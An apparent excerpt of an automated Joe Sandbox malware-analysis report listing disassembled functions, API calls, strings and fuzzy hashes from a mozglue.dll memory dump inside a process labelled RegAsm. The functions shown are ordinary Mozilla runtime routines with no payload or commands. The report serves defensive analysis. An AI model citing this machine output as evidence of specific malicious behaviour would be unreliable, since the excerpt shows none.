                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                      • String ID:
                                                                                      • API String ID: 2047719359-0
                                                                                      • Opcode ID: 31a8a091ad6acd965cdb2f956618d6852ff570f40d3c0968fbdaed7d192638d6
                                                                                      • Instruction ID: 8cb905651b0a9b32c7b1ff561f20800c0816df3856a1802ad87017e4ddc67dde
                                                                                      • Opcode Fuzzy Hash: 31a8a091ad6acd965cdb2f956618d6852ff570f40d3c0968fbdaed7d192638d6
                                                                                      • Instruction Fuzzy Hash: 29E0E531700A248BC220AF26D80865EB7F9EF86218B00022AF44E83B01DB79E54A96D5
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C1385D3
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C138725
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                      • String ID: map/set<T> too long
                                                                                      • API String ID: 3720097785-1285458680
                                                                                      • Opcode ID: 6c86c41b161316263eae045f176a7a4fd42e5a671637bf8c328e6456456c9c66
                                                                                      • Instruction ID: f6eae05a97dff74739917ba60b1d02021712355cc9f8a8c859ceb9e15e00965f
                                                                                      • Opcode Fuzzy Hash: 6c86c41b161316263eae045f176a7a4fd42e5a671637bf8c328e6456456c9c66
                                                                                      • Instruction Fuzzy Hash: 815154B46006618FE701CF18C184B56BBF1BF5A318F19C18AD8599BB62C375E886CF92
                                                                                      APIs
                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0EBDEB
                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EBE8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                      • String ID: 0
                                                                                      • API String ID: 2811501404-4108050209
                                                                                      • Opcode ID: b23650a47f4e85a8875acca240a710bbc93681d3457899441120550ec4bfd703
                                                                                      • Instruction ID: a929a93518545f94b19bf6f223251212a214f5d2fdd4f8a1f2bdfc2cb3db8484
                                                                                      • Opcode Fuzzy Hash: b23650a47f4e85a8875acca240a710bbc93681d3457899441120550ec4bfd703
                                                                                      • Instruction Fuzzy Hash: CA419B719497458FC701CF28C481A9BBBE4AF8E348F008A1DF985A7711E730E9598B86
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9B2C
                                                                                      • memcpy.VCRUNTIME140(6C0E99CF,00000000,?), ref: 6C0E9BB6
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9BF8
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: a846e871ff483c21440cd6c4dd1c6c58e962defec0b3bc41c39bbd5216f79fb0
                                                                                      • Instruction ID: 73b98c1abfde615bec730e11c22350e5a44e2111b1382ad2300fad962075d544
                                                                                      • Opcode Fuzzy Hash: a846e871ff483c21440cd6c4dd1c6c58e962defec0b3bc41c39bbd5216f79fb0
                                                                                      • Instruction Fuzzy Hash: B1D15871A0021A9FCB14CF69C980AEEBBF2FF88314F188529E959A7740D771E955CB90
                                                                                      APIs
                                                                                        • Part of subcall function 6C0F37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C14145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C0F380A
                                                                                        • Part of subcall function 6C128DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C1406E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C128DCC
                                                                                        • Part of subcall function 6C130B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C13138F,?,?,?), ref: 6C130B80
                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C13138F,?,?,?), ref: 6C130B27
                                                                                      • free.MOZGLUE(?,?,?,?,?,6C13138F,?,?,?), ref: 6C130B3F
                                                                                      Strings
                                                                                      • baseprofiler::profiler_capture_backtrace, xrefs: 6C130AB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                                      • String ID: baseprofiler::profiler_capture_backtrace
                                                                                      • API String ID: 3592261714-147032715
                                                                                      • Opcode ID: 34bbd034e33de0a9384476119f86aa3519171c8b14598d52e99f4072ff1aa507
                                                                                      • Instruction ID: e617662154f34a03a15c829c051c7532f387cf66897d257af512a4dc65ee175a
                                                                                      • Opcode Fuzzy Hash: 34bbd034e33de0a9384476119f86aa3519171c8b14598d52e99f4072ff1aa507
                                                                                      • Instruction Fuzzy Hash: 7521F7B5B002549BDB04DF59C850BBFB3B5AF8570CF10042DD819ABB40DB74A945CBA1
                                                                                      APIs
                                                                                      • calloc.MOZGLUE(?,?), ref: 6C0EF19B
                                                                                        • Part of subcall function 6C10D850: EnterCriticalSection.KERNEL32(?), ref: 6C10D904
                                                                                        • Part of subcall function 6C10D850: LeaveCriticalSection.KERNEL32(?), ref: 6C10D971
                                                                                        • Part of subcall function 6C10D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C10D97B
                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C0EF209
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                      • String ID: d
                                                                                      • API String ID: 3775194440-2564639436
                                                                                      • Opcode ID: ec997a5bbaab32adfed7b0d803ab2a5deb08d33261d3b629f6af0812e4d849d6
                                                                                      • Instruction ID: f14dcb161a651862fc8b4bf3a627b38949a5be77255258993247dd09d3c388e1
                                                                                      • Opcode Fuzzy Hash: ec997a5bbaab32adfed7b0d803ab2a5deb08d33261d3b629f6af0812e4d849d6
                                                                                      • Instruction Fuzzy Hash: AD113A36B0564D8AEB048F6899512FEB3FDDF4A208B51522DDC05ABB11EF309A84C390
                                                                                      APIs
                                                                                      • malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                        • Part of subcall function 6C0FCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0FCB49
                                                                                        • Part of subcall function 6C0FCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0FCBB6
                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                                      • String ID: d
                                                                                      • API String ID: 3517139297-2564639436
                                                                                      • Opcode ID: e8b7260277105e41061360527f9a22088b512157f9d4a9c76bbd22d705ce2fc0
                                                                                      • Instruction ID: b3d4687027ce08097e835091e8a241f66603ff17f6f52d69def58b1f1a31a181
                                                                                      • Opcode Fuzzy Hash: e8b7260277105e41061360527f9a22088b512157f9d4a9c76bbd22d705ce2fc0
                                                                                      • Instruction Fuzzy Hash: 98112562E0068883DB01EB68C8011FDB3B4EF96208B858329DC5597612FB30B5C5C380
                                                                                      APIs
                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C123D19
                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C123D6C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: _errnomozalloc_abort
                                                                                      • String ID: d
                                                                                      • API String ID: 3471241338-2564639436
                                                                                      • Opcode ID: 5472e4fbf98b3c54c3be069c32712b51f759d989018fc05f29b640a3bff9629b
                                                                                      • Instruction ID: 2ea01f47c2ebf010205ebffe6fa3e1d536e7dc56da9644ebc4018eb5e0de3c52
                                                                                      • Opcode Fuzzy Hash: 5472e4fbf98b3c54c3be069c32712b51f759d989018fc05f29b640a3bff9629b
                                                                                      • Instruction Fuzzy Hash: 4C110139E0468C9BDB019B69CC148EDB779EF96218BC58328EC449BA02EB34A5C5C790
                                                                                      APIs
                                                                                      • realloc.MOZGLUE(?,?), ref: 6C101A6B
                                                                                        • Part of subcall function 6C101AF0: EnterCriticalSection.KERNEL32(?), ref: 6C101C36
                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C101AE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                                      • String ID: d
                                                                                      • API String ID: 2670432147-2564639436
                                                                                      • Opcode ID: cbb3dc8def25107992d04e148900fad17d51634a262c42e7360c284ea44a0886
                                                                                      • Instruction ID: 807fe5f3e334e12b64f9f5ed99dedb1883508f0c70916084659c28390dc4863b
                                                                                      • Opcode Fuzzy Hash: cbb3dc8def25107992d04e148900fad17d51634a262c42e7360c284ea44a0886
                                                                                      • Instruction Fuzzy Hash: 26112032F0028CC3DB009BA8C8115FEB779EF95208F958618ED466BB02EB34E6C4C380
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0F44B2,6C16E21C,6C16F7F8), ref: 6C0F473E
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0F474A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: GetNtLoaderAPI
                                                                                      • API String ID: 1646373207-1628273567
                                                                                      • Opcode ID: 33ac8014433eebec723a7fa8bb72b658bcb40cbafa16b51c49229ac965aef32c
                                                                                      • Instruction ID: 650ce8fa57017ccabf90f079cd14cf38ee0716e7024b12d677b9df9c265600a7
                                                                                      • Opcode Fuzzy Hash: 33ac8014433eebec723a7fa8bb72b658bcb40cbafa16b51c49229ac965aef32c
                                                                                      • Instruction Fuzzy Hash: 13019E763003249FDF009FA688886297BF9FF8B361B044069ED15C7700DB74D9029FA1
                                                                                      APIs
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C146E22
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C146E3F
                                                                                      Strings
                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C146E1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footergetenv
                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                      • API String ID: 1472356752-1153589363
                                                                                      • Opcode ID: 14fdd4a9b440d722421ad458aeb235026ed0f3b2b0b3c1ce63413af723e229a6
                                                                                      • Instruction ID: 3f592c30261b6aaa6bf4e9c7e5370724a9df81ab3774b79dbe2997aad54118e0
                                                                                      • Opcode Fuzzy Hash: 14fdd4a9b440d722421ad458aeb235026ed0f3b2b0b3c1ce63413af723e229a6
                                                                                      • Instruction Fuzzy Hash: A7F05976208284CBDA00CB6AC854FA137B2E71321CF045165C86087F51C726A617DA93
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F9EEF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: Infinity$NaN
                                                                                      • API String ID: 1385522511-4285296124
                                                                                      • Opcode ID: 442e22ee4fca685607cd20ef1c9e1f13fe85216eb42299e78b69e400342a2d64
                                                                                      • Instruction ID: 2a47f7830ead423737534ae808213d2881ba55aa7e92accaa722d50d7e587847
                                                                                      • Opcode Fuzzy Hash: 442e22ee4fca685607cd20ef1c9e1f13fe85216eb42299e78b69e400342a2d64
                                                                                      • Instruction Fuzzy Hash: A5F0C2B2604241CBDB00CF1AD84976037B1F70331EF205A24C9300BF40D33676A6DA82
                                                                                      APIs
                                                                                      • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C1651C8), ref: 6C14591A
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C14592B
                                                                                      Strings
                                                                                      • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C145915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnvironmentHandleVariable
                                                                                      • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                      • API String ID: 297244470-335682676
                                                                                      • Opcode ID: ff45bf32d43132d1a1b2225b5d06d7574f1059412962b2b9cfa88eefbe64b484
                                                                                      • Instruction ID: a434ad32985d28166fdff5b443967329fff845aeac1f7af6a69b7a03421553b0
                                                                                      • Opcode Fuzzy Hash: ff45bf32d43132d1a1b2225b5d06d7574f1059412962b2b9cfa88eefbe64b484
                                                                                      • Instruction Fuzzy Hash: D5E04F30205240BBDB008B6ACA0C7557FF99B27329F149649F56993ED2C3B5A850E791
                                                                                      APIs
                                                                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C0FBEE3
                                                                                      • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C0FBEF5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$CallsDisableLoadThread
                                                                                      • String ID: cryptbase.dll
                                                                                      • API String ID: 4137859361-1262567842
                                                                                      • Opcode ID: 8f1120bf7188f84e8ccefbdf6d5976e528206ef1b2e1c545ce26f198112174f5
                                                                                      • Instruction ID: 297fc3c23109427d4230efb2f6b61bffeda01f5123bc02f09dc88a00c9f1e563
                                                                                      • Opcode Fuzzy Hash: 8f1120bf7188f84e8ccefbdf6d5976e528206ef1b2e1c545ce26f198112174f5
                                                                                      • Instruction Fuzzy Hash: 8ED0C731184108EAD640AA518D09B3937F49705715F50C021F75554951C7B19451EF54
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C,?,?,?,?,?), ref: 6C0E510A
                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C,?,?,?,?,?), ref: 6C0E5167
                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C0E5196
                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C), ref: 6C0E5234
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                      • Instruction ID: 94c8b31b43617d3cc3214f8f64f3012ba07b7d994737bec37d902213dc025a04
                                                                                      • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                      • Instruction Fuzzy Hash: 87918C79505616CFCB14CF18C490A5ABBE2BF8D318B29898CED589B725D371EC42CBE1
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C120918
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C1209A6
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC,?,00000000), ref: 6C1209F3
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C120ACB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3168844106-0
                                                                                      • Opcode ID: 63e9d2e586a70de540f1d8c40a2ed4421e29cd47071ad4ebe07f9dbb19590cb9
                                                                                      • Instruction ID: 46c86dd2728813ae026190c8dca2ad1a4b843fd6d198d42dc81e6371a6d1d93a
                                                                                      • Opcode Fuzzy Hash: 63e9d2e586a70de540f1d8c40a2ed4421e29cd47071ad4ebe07f9dbb19590cb9
                                                                                      • Instruction Fuzzy Hash: 88514A3B7025508FEF089A1AC82473573B5EFC1B64725433AD96697F80D739E99197C0
                                                                                      APIs
                                                                                      • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C11E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C145A47
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C11E56A,?,|UrlbarCSSSpan), ref: 6C145A5C
                                                                                      • free.MOZGLUE(?), ref: 6C145A97
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C145B9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$mallocmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2682772760-0
                                                                                      • Opcode ID: 1d69b4aee04a644fb93a27c81e406c08ee60c82cc128b0b0fd62a3572b085dd8
                                                                                      • Instruction ID: 3449426816ec7df5b4a87293d01efab85ff585f36d4663a0912f86a5fd3bfd08
                                                                                      • Opcode Fuzzy Hash: 1d69b4aee04a644fb93a27c81e406c08ee60c82cc128b0b0fd62a3572b085dd8
                                                                                      • Instruction Fuzzy Hash: 64515DB06087409FD700CF29C8C071ABBE5EF99318F14CA6DE8999B746D774D945CB62
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B628
